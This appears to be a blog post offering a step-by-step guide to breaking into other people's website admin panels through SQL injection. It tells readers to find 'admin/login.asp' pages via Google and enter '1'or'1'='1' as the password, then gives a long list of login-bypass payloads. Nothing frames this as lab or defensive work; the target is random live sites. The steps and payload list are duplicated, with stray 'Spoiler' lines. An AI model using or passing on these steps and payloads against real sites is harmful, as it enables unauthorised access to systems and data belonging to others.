4:51 AM
![[Image: star.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uKC2AgnV4fMKF_6uwxfES0Zc7VpR1twSl4JaWB8gAhMdvhsIaYYGYUXL0ygu0_FRCxNRd87J3pZcVzcNXesJstpwTs19EYSLReWd_haDAy0XtJAI-V=s0-d)
![[Image: ub3rstar.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v1BiMGi6NHHsogw5985l0rOKaAR92uiXuCRPV5QcdoXPwECqtZnl3NgCSynqxoMU7zsmVJ9eXhPPEkgw6qeo-OYw44-T8LZToVLTR35EDWi2E9D095TVatPA=s0-d)
Basic SQL Injection Attack
For those people who just don't like to read much. I come straight to the point. 
We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
![[Image: GkatiJB.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ukYhLpXQ9CEli-kzLv85nQKkP5lV6TC9eX393bbJZyTirHZWMoovrVFdhdUXNYzH74SM3SiylODNzo8VtJed5AWA=s0-d)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
![[Image: Vl05pX5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsmiIq7070uHtLeLh_AJGW20tHAAfeita3lUEO53ZwMmdFFkH6VkLktWRyYw-Bc2qMEVhjusFylDgJQ6KNWc3AyQ=s0-d)
Well done!! Your now logged in as ADMIN:
![[Image: kvv09kG.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_unSohzTIK3dBFJFMf4kha2wJQ9k1QVP6yXxOXO_Li0zp-2qnOGfetJJxDfoc6sKMB9Gtn6mAvOKHbjVcgbTg0f1Q=s0-d)
![[Image: Heq2Tgg.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tP2hPo07sv4Tf2j-BTRCiM-owZ6jHciZxsLm_-wY0tNK43Gi7Tnw8mlYwqxlSiAvoB8W9XMU-EQv86Lq_qrEcXpQ=s0-d)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
Spoiler (Click to Hide)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
Spoiler (Click to Hide)
Well done!! Your now logged in as ADMIN:
Spoiler (Click to Hide)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
Spoiler (Click to Hide)
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Note: Websites that record false logins, this is not gonna work on.
I made it simple as it is guys, no long story's.
Post below, for any questions/suggestions/feedback and enjoy!
Post below, for any questions/suggestions/feedback and enjoy!
0 comments:
Post a Comment